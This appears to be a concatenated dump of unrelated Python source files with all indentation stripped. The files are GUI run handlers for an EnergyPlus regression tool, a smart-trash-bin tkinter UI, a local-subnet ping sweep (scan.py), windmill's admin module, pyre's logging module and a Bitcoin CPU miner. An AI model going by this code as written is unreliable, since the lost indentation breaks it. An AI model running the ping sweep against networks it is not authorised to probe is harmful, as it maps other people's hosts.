messagebox.showwarning("Nothing to run", "No IDFs were activated, so nothing to run")
return
self.background_operator = SuiteRunner(run_configuration, idfs_to_run)
self.background_operator.add_callbacks(print_callback=MyApp.print_listener,
simstarting_callback=MyApp.starting_listener,
casecompleted_callback=MyApp.case_completed_listener,
simulationscomplete_callback=MyApp.runs_complete_listener,
diffcompleted_callback=MyApp.diff_complete_listener,
alldone_callback=MyApp.done_listener,
cancel_callback=MyApp.cancelled_listener)
self.set_gui_status_for_run(True)
self.long_thread = Thread(target=self.background_operator.run_test_suite)
self.long_thread.daemon = True  # setDaemon() is deprecated in newer Python versions
self.add_to_log("Starting a new set of tests")
self.long_thread.start()
@staticmethod
def print_listener(msg):
pub.sendMessage(PubSubMessageTypes.PRINT, msg=msg)
def print_handler(self, msg):
self.add_to_log(msg)
@staticmethod
def starting_listener(number_of_cases_per_build):
pub.sendMessage(
PubSubMessageTypes.STARTING,
number_of_cases_per_build=number_of_cases_per_build
)
def starting_handler(self, number_of_cases_per_build):
self.progress['maximum'] = 3 * number_of_cases_per_build
self.progress['value'] = 0
@staticmethod
def case_completed_listener(test_case_completed_instance):
pub.sendMessage(PubSubMessageTypes.CASE_COMPLETE, test_case_completed_instance=test_case_completed_instance)
def case_completed_handler(self, test_case_completed_instance):
self.progress['value'] += 1
if test_case_completed_instance.run_success:
message = "Completed %s : %s, Success" % (
test_case_completed_instance.run_directory, test_case_completed_instance.case_name)
self.add_to_log(message)
else:
message = "Completed %s : %s, Failed" % (
test_case_completed_instance.run_directory, test_case_completed_instance.case_name)
self.add_to_log(message)
@staticmethod
def runs_complete_listener():
pub.sendMessage(PubSubMessageTypes.SIMULATIONS_DONE)
def runs_complete_handler(self):
self.add_to_log("Simulation runs complete")
@staticmethod
def diff_complete_listener():
pub.sendMessage(PubSubMessageTypes.DIFF_COMPLETE)
def diff_complete_handler(self):
self.progress['value'] += 1
@staticmethod
def done_listener(results):
pub.sendMessage(PubSubMessageTypes.ALL_DONE, results=results)
def done_handler(self, results: CompletedStructure):
self.add_to_log("All done, finished")
self.label_string.set("Hey, all done!")
if system() == 'Linux':
subprocess.call(['notify-send', 'EnergyPlus Regression Tool', 'Regressions Finished'])
elif system() == 'Darwin':
subprocess.call([
'osascript',
'-e',
'display notification "Regressions Finished" with title "EnergyPlus Regression Tool"'
])
self.build_results_tree(results)
self.client_done()
@staticmethod
def cancelled_listener():
pub.sendMessage(PubSubMessageTypes.CANCELLED)
def cancelled_handler(self):
self.add_to_log("Cancelled!")
self.label_string.set("Properly cancelled!")
self.client_done()
def client_stop(self):
self.add_to_log("Attempting to cancel")
self.label_string.set("Attempting to cancel...")
self.background_operator.interrupt_please()
def client_exit(self):
if self.long_thread:
messagebox.showerror("Uh oh!", "Cannot exit program while operations are running; abort them then exit")
return
sys.exit()
def client_done(self):
self.set_gui_status_for_run(False)
self.long_thread = None
|
ui.py
|
import tkinter as tk
import main
import image
import hardware
import threading,json,time
typelist = ['可回收', '有害', '厨余(湿)', '其他(干)']  # recyclable, hazardous, kitchen (wet), other (dry)
def startui():
serverThread = threading.Thread(target=start)
serverThread.start()
window = None
l = None
b1 = None
sleeptime = 10
def ontake(path):
if window is None:
init()
def updateui():
global w2
global name
w2 = tk.Tk()
w2.title('SmartTrash')
w2.geometry('1280x720')
l = tk.Label(w2, text='您觉得[%s]应该是什么垃圾' % (name), bg='white', fg='black', font=('Arial', 24), width=40, height=4)  # "What kind of waste do you think [%s] should be?"
l.pack()
for i in range(4):
tk.Button(w2, text=typelist[i]+'垃圾', font=('Arial', 24), width=20, height=2, command=lambda arg2=i,arg1=name:updatetype(arg1,arg2)).pack()
w2.mainloop()
def historyui():
global history
history.delete(0,history.size()-1)
history.insert("end", '垃圾投入历史记录')
result=json.loads(image.getHistory())
for item in result:
oneresult='垃圾名:%s 类型:%s 投入时间:%s'%(item[1],typelist[int(item[2])],item[3])
history.insert("end", oneresult)
def updatetype(name,ttype):
global trashtype
image.updatetype(name,ttype)
print('ui.updatetype:name=%s type=%s'%(name,ttype))
if main.usemulti:
image.addHistory(name,trashtype)
historyui()
w2.destroy()
if trashtype.find('无分类')!=-1:
hardware.run(ttype)
trashtype='已提交错误'
def selectname(num):
global selectnum
global resttime
selectnum=num
resttime=0
print("ui.selectname.num="+str(num))
def run():
global l
global name
global trashtype
global window
l.config(text='拍摄照片中')  # "Taking photo..."
image.take()
l.config(text='识别物品中')  # "Identifying item..."
name = image.image_classify(image.image)['result'][0]['keyword']
l.config(text='您识别的垃圾是[%s]\n获取分类中' % (name))  # "Recognized [%s], fetching its category"
trashtype = image.getType(
image.result['result'][0]['keyword'] + '/' + image.result['result'][0]['root'])
if trashtype.find('无分类') == -1:  # '无分类' means "no category found"
l.config(text='您识别的垃圾是[%s]\n您识别的垃圾属于[%s]' % (name, trashtype))  # "Recognized [%s]; it belongs to [%s]"
wrong.config(state='normal')
hardware.run(trashtype)
else:
l.config(text='这是[%s]\n%s' % (name, trashtype))
wrong.config(state='normal')
historyui()
def run_multi():
global l
global name
global trashtype
global window
global selectbtn
global selectnum
global resttime
wrong.config(state='disabled')
l.config(text='拍摄照片中')
image.take()
l.config(text='识别物品中')
ic=image.image_classify(image.image)
if str(ic).find('err')!=-1:
l.config(text='物品识别错误')
print(str(ic))
return
ic=json.loads(json.dumps(ic).replace('/',','))
namelist=[]
for i in range(ic['result_num']):
namelist.append(ic['result'][i]['keyword'])
print('ui.run_multi.namelist:'+str(namelist))
finalname=[]
for i in range(4):
if i==0 or ic['result'][i]['score']>=0.05:
finalname.append(namelist[i])
selectbtn[i].config(state='disabled',text='这是[%s]\n获取分类中' % (namelist[i]))
else:
selectbtn[i].config(state='disabled',text='')
print('ui.run_multi.finalname:'+str(finalname))
typelist=json.loads(image.getType_multi(finalname))
print('ui.run_multi.typelist:'+str(typelist))
for i in range(len(typelist)):
if typelist[i].find('无分类')==-1:
selectbtn[i].config(state='normal',text='这是[%s]\n属于[%s]' % (finalname[i], typelist[i]))
else:
selectbtn[i].config(state='normal',text='这是[%s]\n%s' % (finalname[i], '暂无分类结果'))
selectnum=0
resttime=sleeptime
l.config(text='请选出相对正确的结果\n%s秒后默认选择第一个结果'%(str(sleeptime)))
while resttime>0:
time.sleep(0.1)
resttime=resttime-0.1
#wrong.config(state='normal')
for i in range(4):
selectbtn[i].config(text='',state='disabled')
name=finalname[selectnum]
trashtype=typelist[selectnum]
if trashtype.find('无分类')==-1:
l.config(text='您识别的垃圾是[%s]\n您识别的垃圾属于[%s]' % (name, trashtype))
wrong.config(state='normal')
hardware.run(trashtype)
image.addHistory(name,trashtype)
historyui()
else:
l.config(text='这是[%s]\n%s' % (name, trashtype))
wrong.config(state='normal')
#hardware.run(trashtype)
def start():
global window
global l
global wrong
global b1
global history
global selectbtn
window = tk.Tk()
window.title('SmartTrash')
window.geometry('1280x720')
var = tk.StringVar()
# b1.destroy()
l = tk.Label(window, bg='white', fg='black', font=('Arial', 24), width=60, height=4)
l.pack()
if main.usemulti:
fm=tk.Frame(window)
selectbtn=[]
for i in range(4):
selectbtn.append(tk.Button(fm, text='', font=('Arial', 24), width=15, height=2, command=lambda arg=i:selectname(arg),state='disabled'))
selectbtn[i].pack(side='left')
fm.pack()
else:
take = tk.Button(window, text='拍摄并识别', font=('Arial', 24), width=20, height=2, command=run)
take.pack()
if main.usedist:
take.config(text='自动识别已开启')
take.config(state='disabled')
wrong = tk.Button(window, text='觉得分类有问题?点击提交错误', font=('Arial', 24), width=25, height=2, command=updateui,state='disabled')
wrong.pack()
if main.uihistory:
fmh=tk.Frame(window)
history = tk.Listbox(window,font=('Arial', 24),width=60,height=10)
history.pack()
#sb = tk.Scrollbar(fmh,command=history.yview)
#sb.pack(side='right',fill='y')
#history.config(yscrollcommand=sb.set)
history.insert("end", '垃圾投入历史记录')
historyui()
window.mainloop()
if __name__ == '__main__':
start()
|
scan.py
|
import os
import socket
import multiprocessing
import subprocess
def pinger(job_q, results_q):
DEVNULL = open(os.devnull, 'w')
while True:
ip = job_q.get()
if ip is None:
break
try:
# '-c1' sends a single echo request (Linux/macOS ping syntax)
subprocess.check_call(['ping', '-c1', ip],
stdout=DEVNULL)
results_q.put(ip)
except (subprocess.CalledProcessError, OSError):
pass  # host did not answer (or ping is unavailable); skip it
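# Each pinger() worker exits when it reads the `None` sentinel from the job queue, so
# map_network() below enqueues one None per worker process after all of the addresses
# (a simple "poison pill" shutdown pattern).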
def get_my_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
ip = s.getsockname()[0]
s.close()
return ip
def map_network(pool_size=255):
ip_list = list()
ip_failed = list()
ip_parts = get_my_ip().split('.')
base_ip = ip_parts[0] + '.' + ip_parts[1] + '.' + ip_parts[2] + '.'
jobs = multiprocessing.Queue()
results = multiprocessing.Queue()
pool = [multiprocessing.Process(target=pinger, args=(jobs, results)) for i in range(pool_size)]
for p in pool:
p.start()
for i in range(1, 255):
jobs.put(base_ip + '{0}'.format(i))
for p in pool:
jobs.put(None)
for p in pool:
p.join()
print('\n ----------------------------RESULTS-------------------------------')
while not results.empty():
ip = results.get()
ip_list.append(ip)
try:
print(socket.gethostbyaddr(ip))
except (socket.herror, socket.gaierror):
ip_failed.append(ip)  # no reverse DNS entry for this address
print('\n ---------------------------UNKNOWN IP--------------------------------')
for i in ip_failed:
print(i)
return ip_list
def main():
print('Scanning...')
lst = map_network()
if __name__ == '__main__':
main()
|
admin_lib.py
|
# Copyright (c) 2006-2007 Open Source Applications Foundation
# Copyright (c) 2008-2009 Mikeal Rogers <mikeal.rogers@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import windmill
import logging
from time import sleep
import os, sys
from datetime import datetime
from threading import Thread
import shutil
import socket
from windmill.dep import functest
functest.configure()
def process_options(argv_list):
"""Process all the command line options"""
import admin_options
admin_options.process_module(admin_options)
argv_list.pop(0)
action = None
# This might be the hairiest code in windmill :)
# We have a very specific way we need to parse arguments
# because of the way different arguments interact with each other
# 8/27/2007 Gawd this is ugly, i would love to refactor this but I've
# forgotten what it does -Mikeal
# 12/15/2007 Oh man, I'm going to add a feature to this without refactoring it.
# The issue with this code remains the same and no standard arg parsing
# module can do what we need.
for arg in argv_list:
# Grab the test url if one is given
if arg.startswith('http://') or arg.startswith('https://'):
windmill.settings['TEST_URL'] = arg
functest.registry['url'] = arg
elif arg.startswith('-'):
# Take something like -efg and set the e, f, and g options
options = arg.replace('-', '')
for option in options:
admin_options.flags_dict[option]()
else:
# Any argument not starting with - is a regular named option
value = None
if arg.find('=') != -1:
name, value = arg.split('=')
else:
name = arg
if name in admin_options.options_dict:
processor = admin_options.options_dict[name]
if value is None:
processor()
else:
processor(value)
elif name in action_mapping:
action = action_mapping[name]
else:
print name, 'is not a windmill argument. Sticking in functest registry.'
if value is None:
value = True
functest.registry[name] = value
if action is None:
# If an action is not defined we default to running the service in the foreground
return action_mapping['runserver']
else:
return action
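# Illustrative invocations handled by process_options() above (values are hypothetical):
#   windmill shell http://example.com foo=bar
#       -> action = shell_action, TEST_URL and functest.registry['url'] are set,
#          and the unknown 'foo' lands in functest.registry as 'bar'
#   windmill -e runserver
#       -> each letter after '-' is dispatched through admin_options.flags_dict,
#          and 'runserver' selects the foreground runserver action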
def setup_servers(console_level=logging.INFO):
"""Setup the server and return httpd and loggers"""
windmill.is_active = True
windmill.ide_is_awake = False
if len(logging.getLogger().handlers) > 0:
console_handler = logging.getLogger().handlers[0]
console_handler.setLevel(console_level)
httpd = windmill.server.wsgi.make_windmill_server()
return httpd
def run_threaded(console_level=logging.INFO):
"""Run the server threaded."""
httpd = setup_servers(console_level)
httpd_thread = Thread(target=httpd.start)
getattr(httpd_thread, 'setDaemon', lambda x: x)(True)
httpd_thread.start()
while not httpd.ready:
sleep(.25)
return httpd, httpd_thread
def configure_global_settings(logging_on=True):
"""Configure that global settings for the current run"""
# This logging stuff probably shouldn't be here, it should probably be abstracted
if logging_on:
logging.getLogger().setLevel(0)
console = logging.StreamHandler()
console.setLevel(logging.INFO)
formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')
console.setFormatter(formatter)
logging.getLogger().addHandler(console)
if os.environ.has_key('WINDMILL_CONFIG_FILE'):
local_settings = os.environ['WINDMILL_CONFIG_FILE']
else:
local_settings = None
windmill.settings = windmill.conf.configure_settings(localSettings=local_settings)
port = windmill.settings['SERVER_HTTP_PORT']
while 1:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', port))
s.close()
port += 1
except socket.error:
break
windmill.settings['SERVER_HTTP_PORT'] = port
return windmill.settings
on_ide_awake = []
def setup():
"""Setup server and shell objects"""
global shell_objects_dict
shell_objects_dict = {}
windmill.settings['shell_objects'] = shell_objects_dict
assert not windmill.settings.get('setup_has_run', False)
httpd, httpd_thread = run_threaded(windmill.settings['CONSOLE_LOG_LEVEL'])
shell_objects_dict['httpd'] = httpd
shell_objects_dict['httpd_thread'] = httpd_thread
from windmill.bin import shell_objects
if windmill.settings['CONTINUE_ON_FAILURE'] is not False:
shell_objects.jsonrpc_client.add_json_command('{"method": "commands.setOptions", "params": {"stopOnFailure" : false}}')
if windmill.settings['EXTENSIONS_DIR'] is not None:
shell_objects.load_extensions_dir(windmill.settings['EXTENSIONS_DIR'])
if windmill.settings['RUN_TEST'] is not None:
shell_objects.run_test(windmill.settings['RUN_TEST'])
if windmill.settings['LOAD_TEST'] is not None:
shell_objects.load_test(windmill.settings['LOAD_TEST'])
if windmill.settings['JAVASCRIPT_TEST_DIR']:
shell_objects.run_js_tests(windmill.settings['JAVASCRIPT_TEST_DIR'],
windmill.settings['JAVASCRIPT_TEST_FILTER'],
windmill.settings['JAVASCRIPT_TEST_PHASE'])
browser = [setting for setting in windmill.settings.keys() if setting.startswith('START_') and \
windmill.settings[setting] is True]
import shell_objects
if len(browser) == 1:
shell_objects_dict['browser'] = getattr(shell_objects, browser[0].lower())()
for attribute in dir(shell_objects):
shell_objects_dict[attribute] = getattr(shell_objects, attribute)
shell_objects_dict['setup_has_run'] = True
return shell_objects_dict
def teardown(shell_objects):
"""Teardown the server, threads, and open browsers."""
if windmill.is_active:
windmill.is_active = False
shell_objects['clear_queue']()
for controller in windmill.settings['controllers']:
controller.stop()
del(controller)
if windmill.settings['START_FIREFOX'] and windmill.settings['MOZILLA_CREATE_NEW_PROFILE']:
shutil.rmtree(windmill.settings['MOZILLA_PROFILE'])
for directory in windmill.teardown_directories:
if os.path.isdir(directory):
shutil.rmtree(directory)
# while shell_objects['httpd_thread'].isAlive():
# try:
# shell_objects['httpd'].stop()
# except Exception, e:
# print "Exception occurred while shutting server down:"
# print e
#
# # Hacking workaround for port locking up on linux.
# if sys.platform == 'linux2':
# try:
# shell_objects['httpd'].socket.shutdown(socket.SHUT_RDWR)
# shell_objects['httpd'].socket.close()
# except: pass
shell_objects['httpd'].stop()
#shell_objects['httpd_thread'].join()
def runserver_action(shell_objects):
"""Run the server in the foreground with the options given to the command line"""
try:
if 'runserver' in sys.argv or len(windmill.settings['controllers']) == 0:
print 'Server running...'
if windmill.settings['EXIT_ON_DONE'] and not windmill.settings['JAVASCRIPT_TEST_DIR']:
while windmill.block_exit or (
len(shell_objects['httpd'].controller_queue.queue) != 0 ) or (
len(shell_objects['httpd'].test_resolution_suite.unresolved) != 0 ):
sleep(.25)
elif ( windmill.settings['RUN_TEST'] ):
windmill.runserver_running = True
while windmill.runserver_running:
sleep(.25)
else:
windmill.runserver_running = True
while windmill.runserver_running:
sleep(.25)
teardown(shell_objects)
if windmill.test_has_failed:
sys.exit(1)
except KeyboardInterrupt:
teardown(shell_objects)
sys.exit(1)
def shell_action(shell_objects):
"""Start the windmill shell environment"""
windmill.in_shell = True
# If ipython is installed and we weren't given the usecode option
try:
assert not windmill.settings['USECODE']
from IPython.Shell import IPShellEmbed
ipshell = IPShellEmbed()
ipshell(local_ns=shell_objects)
except:
import code
code.interact(local=shell_objects)
teardown(shell_objects)
# def wxui_action(shell_objects):
# """Start the wxPython based service GUI"""
# try:
# import wxui
# app = wxui.App(shell_objects)
# shell_objects['wxui_app'] = app
# app.MainLoop()
# teardown(shell_objects)
# except ImportError:
# print 'Failed to import wx, defaulting to the shell'
# shell_action(shell_objects)
# def tinderbox_action(shell_objects):
# """Tinderbox action for continuous integration"""
# shell_objects['jsonrpc_client'].add_json_command('{"method": "commands.setOptions", "params": {"stopOnFailure" : false}}')
#
# class ResultsProcessor(object):
# passed = 0
# failed = 0
# def success(self, test, debug):
# self.passed += 1
# def failure(self, test, debug):
# self.failed += 1
#
# result_processor = ResultsProcessor()
# shell_objects['httpd'].test_resolution_suite.result_processor = result_processor
#
# starttime = datetime.now()
# result = None
#
# if windmill.settings['RUN_TEST']:
# try:
# while ( len(shell_objects['httpd'].controller_queue.queue) is not 0 ) or (
# len(shell_objects['httpd'].test_resolution_suite.unresolved) is not 0 ):
# sleep(1)
#
# print '#TINDERBOX# Testname = FullSuite'
# print '#TINDERBOX# Time elapsed = %s' % str (datetime.now() - starttime)
#
# if result_processor.failed > 0 or result_processor.passed is 0:
# result = "FAILED"
# else:
# result = "PASSED"
#
# print '#TINDERBOX# Status = %s' % result
# teardown(shell_objects)
# if result == "FAILED":
# sys.exit(1)
#
# except KeyboardInterrupt:
# teardown(shell_objects)
# if result == "FAILED":
# sys.exit(1)
# else:
# try:
# while not windmill.TESTS_COMPLETED:
# sleep(1)
# except KeyboardInterrupt:
# teardown(shell_objects)
# if result == "FAILED":
# sys.exit(1)
#
# print '#TINDERBOX# Testname = FullSuite'
# print '#TINDERBOX# Time elapsed = %s' % str (datetime.now() - starttime)
# if windmill.RESULTS['fail'] > 0 or windmill.RESULTS['pass'] is 0:
# result = "FAILED"
# else:
# result = "PASSED"
#
# print '#TINDERBOX# Status = %s' % result
# teardown(shell_objects)
# if result == "FAILED":
# sys.exit(1)
def start_windmill():
"""Start windmill and return shell_objects"""
configure_global_settings()
shell_objects = setup()
return shell_objects
def command_line_startup():
"""Command line startup"""
windmill.stdout, windmill.stdin = sys.stdout, sys.stdin
configure_global_settings()
action = process_options(sys.argv)
shell_objects = setup()
action(shell_objects)
action_mapping = {'shell':shell_action, 'runserver':runserver_action,
'run_service':runserver_action}
|
log.py
|
# Copyright (c) 2016-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# pyre-strict
import argparse
import copy
import io
import logging
import os
import re
import sys
import threading
import time
from typing import List, Optional, Sequence # noqa
from . import filesystem
LOG = logging.getLogger(__name__) # type: logging.Logger
PERFORMANCE = 15 # type: int
PROMPT = 50 # type: int
SUCCESS = 60 # type: int
stdout = io.StringIO(newline="") # type: io.StringIO
class Color:
YELLOW = "\033[33m" # type: str
RED = "\033[31m" # type: str
GREEN = "\033[32m" # type: str
class Format:
BOLD = "\033[1m" # type: str
CLEAR_LINE = "\x1b[0G\x1b[K" # type: str
CLEAR = "\033[0m" # type: str
TRUNCATE_OVERFLOW = "\033[?7l" # type: str
WRAP_OVERFLOW = "\033[?7h" # type: str
NEWLINE = "\n" # type: str
CURSOR_UP_LINE = "\x1b[1A" # type: str
HIDE_CURSOR = "\x1b[?25l" # type: str
SHOW_CURSOR = "\x1b[?25h" # type: str
class Character:
LAMBDA = "ƛ" # type: str
class SectionFormatter(logging.Formatter):
def __init__(self) -> None:
super(SectionFormatter, self).__init__("%(asctime)s %(levelname)s %(message)s")
def format(self, record: logging.LogRecord) -> str:
formatted = super(SectionFormatter, self).format(record)
return re.sub(r"DEBUG \[(.*)\]", r"\1", formatted)
class TimedStreamHandler(logging.StreamHandler):
THRESHOLD = 0.5 # type: float
LINE_BREAKING_LEVELS = ["ERROR", "WARNING", "SUCCESS"] # type: Sequence[str]
_terminate = False # type: bool
_last_update = 0.0 # type: float
def __init__(self) -> None:
super(TimedStreamHandler, self).__init__()
self.setFormatter(logging.Formatter("%(message)s"))
self.terminator = "" # type: str
self.setLevel(logging.INFO)
self._record = None # type: Optional[logging.LogRecord]
self._last_record = None # type: Optional[logging.LogRecord]
self._active_lines = 0 # type: int
# Preamble preparing terminal.
sys.stderr.write(
Format.NEWLINE
+ Format.CLEAR_LINE
+ Format.CURSOR_UP_LINE
+ Format.HIDE_CURSOR
)
thread = threading.Thread(target=self._thread)
thread.daemon = True
thread.start()
def clear_lines(self) -> str:
if self._active_lines == 0:
return ""
return Format.CLEAR_LINE + "".join(
[
Format.CURSOR_UP_LINE + Format.CLEAR_LINE
for n in range(self._active_lines - 1)
]
)
def emit(self, record: logging.LogRecord, age: Optional[float] = None) -> None:
self._last_record = record
suffix = ""
color = ""
active_lines = record.msg.count("\n") + 1
if record.levelname in self.LINE_BREAKING_LEVELS:
record.msg += "\n"
if record.levelname == "ERROR":
color = Color.RED
self._record = None
active_lines = 0
elif record.levelname == "WARNING":
color = Color.YELLOW
self._record = None
active_lines = 0
elif record.levelname == "PROMPT":
color = Color.YELLOW
self._record = None
active_lines = 0
elif record.levelname == "SUCCESS":
self._record = None
active_lines = 0
elif age:
if age > 10:
color = Color.YELLOW
if age > 30:
color = Color.RED
suffix = " {}[{:.1f}s]{}".format(
color if color else "", age, Format.CLEAR if color else ""
)
else:
self._record = record
self._last_update = time.time()
timed_record = copy.copy(record)
timed_record.msg = (
"{clear_line}{color} {cursor}{clear} " "{truncate}{message}{suffix}"
).format(
clear_line=self.clear_lines(),
color=color,
cursor=Character.LAMBDA,
clear=Format.CLEAR,
truncate=Format.TRUNCATE_OVERFLOW,
message=record.msg,
suffix=suffix,
)
self._active_lines = active_lines
super(TimedStreamHandler, self).emit(timed_record)
def _thread(self) -> None:
while not self._terminate:
if self._record:
age = time.time() - self._last_update
if age > self.THRESHOLD:
self.emit(self._record, age)
time.sleep(0.1)
def terminate(self) -> None:
last_record = self._last_record
if last_record and last_record.levelname not in self.LINE_BREAKING_LEVELS:
sys.stderr.write("\n")
# Reset terminal.
sys.stderr.write(Format.WRAP_OVERFLOW + Format.SHOW_CURSOR)
sys.stderr.flush()
self._terminate = True
def initialize(arguments: argparse.Namespace) -> None:
if arguments.noninteractive:
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(SectionFormatter())
stream_handler.setLevel(logging.DEBUG)
# pyre-fixme[16]: `Namespace` has no attribute `timed_stream_handler`.
arguments.timed_stream_handler = None
else:
stream_handler = TimedStreamHandler()
arguments.timed_stream_handler = stream_handler
handlers = [stream_handler] # type: List[logging.Handler]
if not arguments.noninteractive:
pyre_directory = filesystem.make_pyre_directory()
file_handler = logging.FileHandler(os.path.join(pyre_directory, "pyre.stderr"))
file_handler.setFormatter(SectionFormatter())
file_handler.setLevel(logging.DEBUG)
handlers.append(file_handler)
logging.addLevelName(PERFORMANCE, "PERFORMANCE")
logging.addLevelName(PROMPT, "PROMPT")
logging.addLevelName(SUCCESS, "SUCCESS")
logging.basicConfig(level=logging.DEBUG, handlers=handlers)
def cleanup(arguments: argparse.Namespace) -> None:
if arguments.timed_stream_handler:
arguments.timed_stream_handler.terminate()
output = stdout.getvalue()
if output:
sys.stdout.write(output + "\n")
class Buffer:
THRESHOLD = 0.1 # type: float
_flushed = False # type: bool
def __init__(self, section: str, data: List[str]) -> None:
self._section = section # type: str
self._data = data # type: List[str]
self._lock = threading.RLock() # type: threading.RLock
thread = threading.Thread(target=self._thread)
thread.daemon = True
thread.start()
def append(self, line: str) -> None:
self._data.append(line)
def flush(self) -> None:
with self._lock:
if self._flushed is True:
return
self._flushed = True
message = "\n".join(self._data)
if self._section == "ERROR":
LOG.error(message)
elif self._section == "INFO":
LOG.info(message)
elif self._section == "DUMP":
LOG.warning(message)
elif self._section == "WARNING":
LOG.warning(message)
elif self._section == "PROGRESS":
LOG.info(message)
elif self._section == "PARSER":
LOG.error(message)
else:
LOG.debug("[%s] %s", self._section, message)
def _thread(self) -> None:
time.sleep(self.THRESHOLD)
with self._lock:
if not self._flushed:
self.flush()
def get_yes_no_input(prompt: str) -> bool:
choice = get_input(prompt, suffix=" [Y/n] ")
return choice.lower() in ["", "y", "ye", "yes"]
def get_optional_input(prompt: str, default: str) -> str:
result = get_input(prompt, suffix=" (Default: `{}`): ".format(default))
if result == "":
return default
return result
def get_input(prompt: str, suffix: str = "") -> str:
LOG.log(PROMPT, prompt + suffix)
return input().strip()
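# Minimal usage sketch (hypothetical argparse namespace; this module only needs a
# `noninteractive` attribute on it before initialize() is called):
#
#   parser = argparse.ArgumentParser()
#   parser.add_argument("--noninteractive", action="store_true")
#   arguments = parser.parse_args()
#   initialize(arguments)              # installs the timed or plain stream handler
#   LOG.log(SUCCESS, "All done")       # SUCCESS/ERROR/WARNING break the timed status line
#   cleanup(arguments)                 # restores the cursor and flushes captured stdout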
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] is not None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
